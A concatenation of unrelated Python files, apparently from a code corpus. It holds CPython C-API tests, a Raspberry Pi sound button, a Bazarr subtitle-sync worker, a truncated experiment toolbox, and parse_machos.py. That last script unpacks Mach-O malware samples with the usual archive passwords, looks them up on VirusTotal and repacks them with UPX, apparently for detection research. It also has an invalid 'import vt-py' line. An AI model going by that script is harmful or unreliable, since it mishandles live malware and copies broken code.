def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
def test_subinterps_recent_language_features(self):
r, w = os.pipe()
code = """if 1:
import pickle
with open({:d}, "wb") as f:
@(lambda x:x) # Py 3.9
def noop(x): return x
a = (b := f'1{{2}}3') + noop('x') # Py 3.8 (:=) / 3.6 (f'')
async def foo(arg): return await arg # Py 3.5
pickle.dump(dict(a=a, b=b), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertEqual(pickle.load(f), {'a': '123x', 'b': '123'})
def test_mutate_exception(self):
"""
Exceptions saved in global module state get shared between
individual module instances. This test checks whether or not
a change in one interpreter's module gets reflected into the
other ones.
"""
import binascii
support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")
self.assertFalse(hasattr(binascii.Error, "foobar"))
@unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
def test_module_state_shared_in_global(self):
"""
bpo-44050: Extension module state should be shared between interpreters
when it doesn't support sub-interpreters.
"""
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
script = textwrap.dedent(f"""
import importlib.machinery
import importlib.util
import os
fullname = '_test_module_state_shared'
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
attr_id = str(id(module.Error)).encode()
os.write({w}, attr_id)
""")
exec(script)
main_attr_id = os.read(r, 100)
ret = support.run_in_subinterp(script)
self.assertEqual(ret, 0)
subinterp_attr_id = os.read(r, 100)
self.assertEqual(main_attr_id, subinterp_attr_id)
class TestThreadState(unittest.TestCase):
@threading_helper.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
# Suppress warning from PyUnicode_FromUnicode().
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_widechar(self):
_testcapi.test_widechar()
def test_version_api_data(self):
self.assertEqual(_testcapi.Py_Version, sys.hexversion)
class Test_testinternalcapi(unittest.TestCase):
locals().update((name, getattr(_testinternalcapi, name))
for name in dir(_testinternalcapi)
if name.startswith('test_'))
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure(
'-c', code,
PYTHONMALLOC=self.PYTHONMALLOC,
# FreeBSD: instruct jemalloc to not fill freed() memory
# with junk byte 0x5a, see JEMALLOC(3)
MALLOC_CONF="junk:false",
)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: _PyMem_DebugMalloc: '
'Python memory allocator called without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func_name):
code = textwrap.dedent(f'''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
try:
_testcapi.{func_name}()
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(0)
except _testcapi.error:
os._exit(1)
''')
assert_python_ok(
'-c', code,
PYTHONMALLOC=self.PYTHONMALLOC,
MALLOC_CONF="junk:false",
)
def test_pyobject_null_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_null_is_freed')
def test_pyobject_uninitialized_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')
def test_pyobject_forbidden_bytes_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')
def test_pyobject_freed_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
@unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
class Test_ModuleStateAccess(unittest.TestCase):
"""Test access to module start (PEP 573)"""
# The C part of the tests lives in _testmultiphase, in a module called
# _testmultiphase_meth_state_access.
# This module has multi-phase initialization, unlike _testcapi.
def setUp(self):
fullname = '_testmultiphase_meth_state_access' # XXX
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
loader.exec_module(module)
self.module = module
def test_subclass_get_module(self):
"""PyType_GetModule for defining_class"""
class StateAccessType_Subclass(self.module.StateAccessType):
pass
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_subclass_get_module_with_super(self):
class StateAccessType_Subclass(self.module.StateAccessType):
def get_defining_module(self):
return super().get_defining_module()
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_state_access(self):
"""Checks methods defined with and without argument clinic
This tests a no-arg method (get_count) and a method with
both a positional and keyword argument.
"""
a = self.module.StateAccessType()
b = self.module.StateAccessType()
methods = {
'clinic': a.increment_count_clinic,
'noclinic': a.increment_count_noclinic,
}
for name, increment_count in methods.items():
with self.subTest(name):
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
increment_count()
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 1)
increment_count(3)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 4)
increment_count(-2, twice=True)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
with self.assertRaises(TypeError):
increment_count(thrice=3)
with self.assertRaises(TypeError):
increment_count(1, 2, 3)
if __name__ == "__main__":
unittest.main()
|
parse_machos.py | """
Copyright 2021 Kimo Bumanglag <kimo.bumanglag@trojans.dsu.edu>
"""
import argparse
import py7zr
import zipfile
import magic
import os
import json
import sys
import math
import subprocess
import vt-py
from macholibre import parse
from tqdm import tqdm
from threading import Thread
parser = argparse.ArgumentParser(
description="Search a filesystem for Mach-O files and parse them to JSON objects."
)
parser.add_argument(
"--path", default=".", type=str, help="Where to look for Mach-O files."
)
parser.add_argument(
"--passwords",
default=["infected", "virussign", "infect3d"],
nargs="+",
type=str,
help="Passwords to unzip samples.",
)
parser.add_argument(
"--tmpdir",
default="/tmp/samples",
type=str,
help="Where to output extracted zip objects.",
)
parser.add_argument(
"--outdir",
default="/tmp/json_data",
type=str,
help="Where to output JSON objects.",
)
args = parser.parse_args()
if not os.path.isdir(args.tmpdir):
os.mkdir(args.tmpdir)
if not os.path.isdir(args.outdir):
os.mkdir(args.outdir)
def calculateEntropy(filename: str) -> float:
with open(filename, "rb") as f:
byteArray = f.read()
filesize = len(byteArray)
freqList = []
for b in range(256):
ctr = 0
for byte in byteArray:
if byte == b:
ctr += 1
freqList.append(float(ctr) / filesize)
# Shannon entropy
ent = 0.0
for freq in freqList:
if freq > 0:
ent = ent + freq * math.log(freq, 2)
ent = -ent
return ent
def getFiletype(filename: str) -> str:
"""
Checks whether the provided file is a Macho-O, 7-zip, or Zip.
Argument: a filename to check
Return: one of selected filetypes
"""
filetype = magic.from_file(filename)
if "Mach-O" in filetype:
return "Macho"
elif "7-zip" in filetype:
return "7zip"
elif "Zip" in filetype:
return "Zip"
def unzipFile(filename: str):
"""
Extracts zip files to the specified output directory
Argument: a zip filename to extract
"""
try:
myzip = zipfile.ZipFile(filename)
except zipfile.BadZipFile:
pass
for password in args.passwords:
try:
myzip.extractall(path=args.tmpdir, pwd=bytes(password, "ascii"))
break
except:
print(f"Failed to extract {filename} with {password}")
def un7zipFile(filename: str):
"""
Extracts 7zip files to the specified output directory
Argument: a 7zip filename to extract
"""
try:
myzip = py7zr.SevenZipFile(filename)
except:
pass
for password in args.passwords:
try:
myzip.extractall(path=args.tmpdir, password=bytes(password, "ascii"))
break
except:
print(f"Failed to extract with {password}")
def getFiles(path: str, file_list: list):
"""
Walk a given path and add Mach-O, Zip, or 7-Zip files to the appropriate list
Arguments: path - the directory to walk
file_list - a list of lists
"""
for root, dirs, files in os.walk(path):
for filename in files:
fullpath = os.path.join(root, filename)
if not os.access(fullpath, os.R_OK):
continue
filetype = getFiletype(fullpath)
if filetype == "Macho":
file_list["machos"].append(fullpath)
elif filetype == "Zip":
file_list["zips"].append(fullpath)
elif filetype == "7zip":
file_list["7zips"].append(fullpath)
def extractZipLists(file_list: list):
"""
Iterate through the lists containing zip files and extract them
Argument: the list of lists containing the zips and 7zips lists.
"""
for filegroup in file_list:
for filename in file_list["zips"]:
new_thread = Thread(target=unzipFile, args=(filename,))
new_thread.start()
file_list["zips"].remove(filename)
for filename in file_list["7zips"]:
new_thread = Thread(target=un7zipFile, args=(filename,))
new_thread.start()
file_list["7zips"].remove(filename)
def pack_file(filename: str, sha256: str):
"""
Call subprocess to execute UPX and pack a valid Mach-o
Argument: The filename to pack
"""
basename = f"{sha256}.packed"
out_file = os.path.join(args.outdir, basename)
cmd = ["upx", filename, "-k", f"-o{out_file}"]
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
fout, ferr = process.communicate()
if not ferr:
return out_file
else:
return False
def parseFile(filename: str):
"""
Iterate the list of Mach-Os and call macholibre.parse against each file
Argument: the list of lists with Mach-O files
"""
try:
print(f"[ ] Parsing {filename}")
data = parse(filename)
data["filepath"] = filename
data["entropy"] = calculateEntropy(filename)
sha256 = data["hashes"]["sha256"]
vtresults = client.get_object(f"/files/{sha256}")
data["vtresults"] = vtresults
packed = pack_file(filename, sha256)
if packed:
basename = sha256 + ".json"
out_file = os.path.join(args.outdir, basename)
with open(out_file, "w") as f:
f.write(json.dumps(data))
datap = parse(packed)
datap["filepath"] = packed
datap["entropy"] = calculateEntropy(packed)
datap["vtresults"] = vtresults
basenamep = sha256 + ".packed.json"
out_filep = os.path.join(args.outdir, basenamep)
with open(out_filep, "w") as f:
f.write(json.dumps(datap))
except Exception as e:
print(f"[-] Failed to parse {filename}: {e}")
if __name__ == "__main__":
client = vt.Client("")
file_list = {}
file_list["machos"] = []
file_list["zips"] = []
file_list["7zips"] = []
getFiles(args.path, file_list)
total_files = (
len(file_list["machos"]) + len(file_list["zips"]) + len(file_list["7zips"])
)
print("Found {0} files".format(total_files))
# extractZipLists(file_list)
getFiles(args.tmpdir, file_list)
print("Total malware: {0}".format(len(file_list["machos"])))
for filename in tqdm(file_list["machos"], bar_format="{l_bar}{bar}"):
new_thread = Thread(target=parseFile, args=(filename,))
new_thread.start()
|
button.py | import RPi.GPIO as GPIO
import time
import threading
from pygame import mixer
mixer.init()
GPIO.setmode(GPIO.BCM)
INPUT = 24
GPIO.setwarnings(False)
GPIO.setup([INPUT], GPIO.IN , pull_up_down=GPIO.PUD_DOWN)
isFirstPress = True
def music_thread():
mixer.music.load('./audio/Moose-Sound.wav')
mixer.music.play()
def handle(pin):
global isFirstPress
if isFirstPress == True:
t = threading.Thread(target=music_thread)
t.daemon = True
t.start()
print("starting playback")
isFirstPress = False
time.sleep(3)
else:
isFirstPress = True
GPIO.add_event_detect(INPUT, GPIO.RISING, handle)
while True:
time.sleep(1e6)
|
subsync.py | import os
import time
import shlex
import shutil
import requests
import threading
import json
from watchdog.observers import Observer
from watchdog.events import FileSystemEvent, FileSystemEventHandler
from subprocess import check_call, DEVNULL, check_output, STDOUT, CalledProcessError
BAZARR_URL = os.environ.get('BAZARR_URL')
BAZARR_API_KEY = os.environ.get('BAZARR_API_KEY')
BAZARR_USERNAME = os.environ.get('BAZARR_USERNAME')
BAZARR_PASSWORD = os.environ.get('BAZARR_PASSWORD')
NUM_WORKERS = int(os.environ.get('NUM_WORKERS')) if os.environ.get('NUM_WORKERS') else 1
JOBS_FOLDER = '/.config/jobs'
FAILED_JOBS_FOLDER = '/.config/failed_jobs'
if not os.path.exists(JOBS_FOLDER):
os.mkdir(JOBS_FOLDER)
if not os.path.exists(FAILED_JOBS_FOLDER):
os.mkdir(FAILED_JOBS_FOLDER)
event_lock = threading.Lock()
last_file_event = 0
last_event = None
worker_sem = threading.Semaphore(NUM_WORKERS)
working_lock = threading.Lock()
working = set()
class AnyEventHandler(FileSystemEventHandler):
def on_any_event(self, event):
global last_file_event
global last_event
event_lock.acquire()
t = time.time()
if t > last_file_event:
last_file_event = t
if not isinstance(last_event, FileSystemEvent) or event.src_path != last_event.src_path:
print(event)
last_event = event
event_lock.release()
def sync(file):
global worker_sem
global working
with open(file, 'r') as f:
job = json.load(f)
if job['ref_lang'] == 'None':
job['ref_lang'] = 'eng'
subsync_ref_lang = job['ref_lang'] \
.replace('fra', 'fre') \
.replace('deu', 'ger') \
.replace('lit', 'eng') # Bazarr thinks YTS.LT releases are Lithuanian
subsync_sub_lang = job['sub_lang'] \
.replace('fra', 'fre') \
.replace('deu', 'ger') \
.replace('lit', 'eng') # Bazarr thinks YTS.LT releases are Lithuanian
print(f'Syncing {os.path.basename(file)}')
command = f'/subsync/bin/subsync --cli --verbose 0 sync ' \
f'--ref "{job["ref"]}" --ref-stream-by-type audio --ref-lang "{subsync_ref_lang}" ' \
f'--sub "{job["sub"]}" --sub-lang "{subsync_sub_lang}" ' \
f'--out "{job["sub"]}" --overwrite'
try:
check_call(shlex.split(command), stdout=DEVNULL, stderr=DEVNULL)
print(f'Successful subsync {os.path.basename(file)}')
if os.path.exists(os.path.join(FAILED_JOBS_FOLDER, os.path.basename(file))):
os.remove(os.path.join(FAILED_JOBS_FOLDER, os.path.basename(file)))
except CalledProcessError as e:
print(f'Subsync failed {os.path.basename(file)} | {e}')
command = f'/usr/local/bin/ffsubsync "{job["ref"]}" -i "{job["sub"]}" ' \
f' --max-offset-seconds 600 --encoding UTF-8 --overwrite-input'
try:
stdout = check_output(shlex.split(command), stderr=STDOUT, encoding='UTF-8')
if 'Synchronization failed' in str(stdout):
raise CalledProcessError(2, shlex.split(command))
print(f'Successful ffsubsync {os.path.basename(file)}')
if os.path.exists(os.path.join(FAILED_JOBS_FOLDER, os.path.basename(file))):
os.remove(os.path.join(FAILED_JOBS_FOLDER, os.path.basename(file)))
except CalledProcessError as e:
print(f'FFSubsync failed {os.path.basename(file)} | {e}')
print(f'Blacklisting {os.path.basename(file)}')
s = requests.session()
headers = {"x-api-key": BAZARR_API_KEY}
r = s.post(f"{BAZARR_URL}/api/system/account?action=login",
data={"username": BAZARR_USERNAME, "password": BAZARR_PASSWORD})
if not r.ok:
print("Authentication failed")
shutil.copy(file, os.path.join(FAILED_JOBS_FOLDER, os.path.basename(file)))
else:
data = {
'subtitles_path': job["sub"],
'provider': job["provider"],
'subs_id': job["sub_id"],
'language': job["sub_code_2"],
}
if not job["series_id"]:
url = f"{BAZARR_URL}/api/movies/blacklist?radarrid={job['episode_id']}"
else:
url = f"{BAZARR_URL}/api/episodes/blacklist?seriesid={job['series_id']}&episodeid={job['episode_id']}"
r = s.post(url, data=data, headers=headers)
if r.ok:
print(f'Blacklisted {os.path.basename(file)}')
else:
print(f'Failed to blacklist {os.path.basename(file)} : {r.text}')
shutil.copy(file, os.path.join(FAILED_JOBS_FOLDER, os.path.basename(file)))
finally:
working_lock.acquire()
os.remove(file)
working.remove(file)
working_lock.release()
worker_sem.release()
if __name__ == '__main__':
observer = Observer()
observer.schedule(AnyEventHandler(), JOBS_FOLDER, recursive=True)
observer.start()
while True:
time.sleep(3)
event_lock.acquire()
content = os.listdir(JOBS_FOLDER)
if last_file_event + 10 < time.time():
event_lock.release()
for thing in content:
path = os.path.join(JOBS_FOLDER, thing)
working_lock.acquire()
cond = path in working
working_lock.release()
if cond:
continue
if os.path.exists(path):
if os.path.isfile(path):
worker_sem.acquire()
working_lock.acquire()
working.add(path)
working_lock.release()
worker = threading.Thread(target=sync, args=(path,))
worker.start()
else:
print(f'Warning: non-file found in jobs queue ({thing})')
else:
print(f"Job file doesn't exist ({thing})")
else:
event_lock.release()
|
tb_experiments.py | import argparse
import itertools
import multiprocessing
import stat
import time
import psutil
import os
import json
import uuid
import research_toolbox.tb_filesystem as tb_fs
import research_toolbox.tb_io as tb_io
import research_toolbox.tb_logging as tb_lg
import research_toolbox.tb_utils as tb_ut
import research_toolbox.tb_random as tb_ra
class CommandLineArgs:
def __init__(self, argname_prefix=''):
self.parser = argparse.ArgumentParser()
self.argname_prefix = argname_prefix
def add(self,
argname,
argtype,
default_value=None,
optional=False,
help=None,
valid_value_lst=None,
list_valued=False):
valid_types = {'int': int, 'str': str, 'float': float}
assert argtype in valid_types
nargs = None if not list_valued else '*'
argtype = valid_types[argtype]
self.parser.add_argument(
'--' + self.argname_prefix + argname,
required=not optional,
default=default_value,
nargs=nargs,
type=argtype,
choices=valid_value_lst,
help=help)
def parse(self):
return vars(self.parser.parse_args())
def get_parser(self):
return self.parser
def get_available_filename(folderpath, filename_prefix):
idx = 0
while True:
name = "%s%d" % (filename_prefix, idx)
path = tb_fs.join_paths([folderpath, name])
if not tb_fs.path_exists(path):
break
else:
idx += 1
return name
def get_config():
cmd = CommandLineArgs()
cmd.add('config_filepath', 'str')
out = cmd.parse()
cfg = tb_io.read_jsonfile_with_overlays(out['config_filepath'])
return cfg
# generating the call lines for a call to main.
def generate_call_lines(main_filepath,
argname_lst,
argvalue_lst,
output_filepath=None,
profile_filepath=None):
sc_lines = ['export PYTHONPATH=".:$PYTHONPATH" && python -u \\']
# add the profiling instruction.
if profile_filepath is not None:
sc_lines += ['-m cProfile -o %s \\' % profile_filepath]
sc_lines += ['%s \\' % main_filepath]
# arguments for the call
sc_lines += [
' --%s %s \\' % (k, v)
for k, v in itertools.izip(argname_lst[:-1], argvalue_lst[:-1])
]
# add the output redirection.
if output_filepath is not None:
sc_lines += [
' --%s %s \\' % (argname_lst[-1], argvalue_lst[-1]),
' > %s 2>&1' % (output_filepath)
]
else:
sc_lines += [' --%s %s' % (argname_lst[-1], argvalue_lst[-1])]
return sc_lines
# all paths are relative to the current working directory or to entry folder path.
def create_run_script(
main_filepath,
argname_lst,
argvalue_lst,
script_filepath,
# entry_folderpath=None,
output_filepath=None,
profile_filepath=None):
sc_lines = ['#!/bin/bash', 'set -e']
# # change into the entry folder if provided.
# if entry_folderpath is not None:
# sc_lines += ['cd %s' % entry_folderpath]
# call the main function.
sc_lines += generate_call_lines(
**tb_ut.subset_dict_via_selection(locals(), [
'main_filepath', 'argname_lst', 'argvalue_lst', 'output_filepath',
'profile_filepath'
]))
# change back to the previous folder if I change to some other folder.
# if entry_folderpath is not None:
# sc_lines += ['cd -']
tb_io.write_textfile(script_filepath, sc_lines, with_newline=True)
# add run permissions.
st = os.stat(script_filepath)
exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
os.chmod(script_filepath, st.st_mode | exec_bits)
# NOTE: can be done more concisely with a for loop.
def create_runall_script(experiment_folderpath):
fo_names = tb_fs.list_folders(
experiment_folderpath, recursive=False, use_relative_paths=True)
num_exps = len(
[n for n in fo_names if tb_fs.path_last_element(n).startswith('cfg')])
# creating the script.
sc_lines = ['#!/bin/bash']
sc_lines += [
tb_fs.join_paths([experiment_folderpath,
"cfg%d" % i, 'run.sh']) for i in xrange(num_exps)
]
# creating the run all script.
out_filepath = tb_fs.join_paths([experiment_folderpath, 'run.sh'])
tb_io.write_textfile(out_filepath, sc_lines, with_newline=True)
st = os.stat(out_filepath)
exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
os.chmod(out_filepath, st.st_mode | exec_bits)
# NOTE: for now, this relies on the fact that upon completion of an experiment
# a results.json file, i.e., the existence of this file is used to determine
# if the folder related to this experiment has been run or not.
def create_runall_script_with_parallelization(experiment_folderpath):
fo_names = tb_fs.list_folders(
experiment_folderpath, recursive=False, use_relative_paths=True)
num_exps = len(
[n for n in fo_names if tb_fs.path_last_element(n).startswith('cfg')])
# creating the script.
sc_lines = [
'#!/bin/bash', 'if [ "$#" -lt 0 ] && [ "$#" -gt 3 ]; then',
' echo "Usage: run.sh [worker_id num_workers] [--force-rerun]"',
' exit 1', 'fi', 'force_rerun=0',
'if [ $# -eq 0 ] || [ $# -eq 1 ]; then', ' worker_id=0',
' num_workers=1', ' if [ $# -eq 1 ]; then',
' if [ "$1" != "--force-rerun" ]; then',
' echo "Usage: run.sh [worker_id num_workers] [--force-rerun]"',
' exit 1', ' else', ' force_rerun=1',
' fi', ' fi', 'else', ' worker_id=$1',
' num_workers=$2', ' if [ $# -eq 3 ]; then',
' if [ "$3" != "--force-rerun" ]; then',
' echo "Usage: run.sh [worker_id num_workers] [--force-rerun]"',
' exit 1', ' else', ' force_rerun=1',
' fi', ' fi', 'fi',
'if [ $num_workers -le $worker_id ] || [ $worker_id -lt 0 ]; then',
' echo "Invalid call: requires 0 <= worker_id < num_workers."',
' exit 1', 'fi'
'',
'num_exps=%d' % num_exps, 'i=0', 'while [ $i -lt $num_exps ]; do',
' if [ $(($i % $num_workers)) -eq $worker_id ]; then',
' if [ ! -f %s ] || [ $force_rerun -eq 1 ]; then' %
tb_fs.join_paths([experiment_folderpath, "cfg$i", 'results.json']),
' echo cfg$i',
' %s' % tb_fs.join_paths(
[experiment_folderpath, "cfg$i", 'run.sh']), ' fi', ' fi',
' i=$(($i + 1))', 'done'
]
# creating the run all script.
out_filepath = tb_fs.join_paths([experiment_folderpath, 'run.sh'])
tb_io.write_textfile(out_filepath, sc_lines, with_newline=True)
st = os.stat(out_filepath)
exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
os.chmod(out_filepath, st.st_mode | exec_bits)
# NOTE: not the perfect way of doing things, but it is a reasonable way for now.
# main_relfilepath is relative to the project folder path.
# entry_folderpath is the place it changes to before executing.
# if code and data folderpaths are provided, they are copied to the exp folder.
# all paths are relative I think that that is what makes most sense.
def create_experiment_folder(
main_filepath,
argname_lst,
argval_lst_lst,
output_folderpath_argname,
all_experiments_folderpath,
readme,
experiment_name=None,
# entry_folderpath=None,
code_folderpath=None,
# data_folderpath=None,
capture_output=False,
profile_run=False):
assert tb_fs.folder_exists(all_experiments_folderpath)
assert experiment_name is None or (not tb_fs.path_exists(
tb_fs.join_paths([all_experiments_folderpath, experiment_name])))
# assert folder_exists(project_folderpath) and file_exists(tb_fs.join_paths([
# project_folderpath, main_relfilepath]))
# create the main folder where things for the experiment will be.
if experiment_name is None:
experiment_name = get_available_filename(all_experiments_folderpath,
"exp")
experiment_folderpath = tb_fs.join_paths(
[all_experiments_folderpath, experiment_name])
tb_fs.create_folder(experiment_folderpath)
# copy the code to the experiment folder.
if code_folderpath is not None:
code_foldername = tb_fs.path_last_element(code_folderpath)
dst_code_fo = tb_fs.join_paths([experiment_folderpath, code_foldername])
tb_fs.copy_folder(
code_folderpath,
dst_code_fo,
ignore_hidden_files=True,
ignore_hidden_folders=True,
ignore_file_exts=['.pyc'])
# change main_filepath to use that new code.
main_filepath = tb_fs.join_paths([experiment_folderpath, main_filepath])
# NOTE: no data copying for now because it often does not make much sense.
data_folderpath = None ### TODO: remove later.
# # copy the code to the experiment folder.
# if data_folderpath is not None:
# data_foldername = path_last_element(data_folderpath)
# dst_data_fo = join_paths([experiment_folderpath, data_foldername])
# copy_folder(data_folderpath, dst_data_fo,
# ignore_hidden_files=True, ignore_hidden_folders=True)
# write the config for the experiment.
tb_io.write_jsonfile(
tb_ut.subset_dict_via_selection(locals(), [
'main_filepath', 'argname_lst', 'argval_lst_lst',
'output_folderpath_argname', 'all_experiments_folderpath', 'readme',
'experiment_name', 'code_folderpath', 'data_folderpath',
'capture_output', 'profile_run'
]), tb_fs.join_paths([experiment_folderpath, 'config.json']))
# generate the executables for each configuration.
argname_lst = list(argname_lst)
argname_lst.append(output_folderpath_argname)
for (i, vs) in enumerate(argval_lst_lst):
cfg_folderpath = tb_fs.join_paths([experiment_folderpath, "cfg%d" % i])
tb_fs.create_folder(cfg_folderpath)
# create the script
argvalue_lst = list(vs)
argvalue_lst.append(cfg_folderpath)
call_args = tb_ut.subset_dict_via_selection(
locals(), ['argname_lst', 'argvalue_lst', 'main_filepath'])
call_args['script_filepath'] = tb_fs.join_paths(
[cfg_folderpath, 'run.sh'])
if capture_output:
call_args['output_filepath'] = tb_fs.join_paths(
[cfg_folderpath, 'output.txt'])
if profile_run:
call_args['profile_filepath'] = tb_fs.join_paths(
[cfg_folderpath, 'profile.txt'])
create_run_script(**call_args)
# write a config file for each configuration
tb_io.write_jsonfile(
tb_ut.create_dict(argname_lst, argvalue_lst),
tb_fs.join_paths([cfg_folderpath, 'config.json']))
# create_runall_script(experiment_folderpath)
create_runall_script_with_parallelization(experiment_folderpath)
return experiment_folderpath
### tools for processing the experiments folders once they have finished.
def map_experiment_folder(experiment_folderpath, fn):
fo_paths = tb_fs.list_folders(
experiment_folderpath, recursive=False, use_relative_paths=False)
num_exps = len(
[p for p in fo_paths if tb_fs.path_last_element(p).startswith('cfg')])
ps = []
rs = []
for i in xrange(num_exps):
p = tb_fs.join_paths([experiment_folderpath, 'cfg%d' % i])
rs.append(fn(p))
ps.append(p)
return (ps, rs)
def load_experiment_folder(experiment_folderpath,
json_filename_lst,
abort_if_notexists=True,
only_load_if_all_exist=False):
def _fn(cfg_path):
ds = []
for name in json_filename_lst:
p = tb_fs.join_paths([cfg_path, name])
if (not abort_if_notexists) and (not tb_fs.file_exists(p)):
d = None
# if abort if it does not exist, it is going to fail reading the file.
else:
d = tb_io.read_jsonfile(p)
ds.append(d)
return ds
(ps, rs) = map_experiment_folder(experiment_folderpath, _fn)
# filter only the ones that loaded successfully all files.
if only_load_if_all_exist:
proc_ps = []
proc_rs = []
for i in xrange(len(ps)):
if all([x is not None for x in rs[i]]):
proc_ps.append(ps[i])
proc_rs.append(rs[i])
(ps, rs) = (proc_ps, proc_rs)
return (ps, rs)
def generate_config_args(d, ortho=False):
ks = d.keys()
if not ortho:
vs_list = tb_ut.iter_product([d[k] for k in ks])
else:
vs_list = tb_ut.iter_ortho_all([d[k] for k in ks], [0] * len(ks))
argval_lst_lst = []
for vs in vs_list:
proc_v = []
for k, v in itertools.izip(ks, vs):
if isinstance(k, tuple):
# if it is iterable, unpack v
if isinstance(v, list) or isinstance(v, tuple):
assert len(k) == len(v)
proc_v.extend(v)
# if it is not iterable, repeat a number of times equal
# to the size of the key.
else:
proc_v.extend([v] * len(k))
else:
proc_v.append(v)
argval_lst_lst.append(proc_v)
# unpacking if there are multiple tied argname_lst
argname_lst = []
for k in ks:
if isinstance(k, tuple):
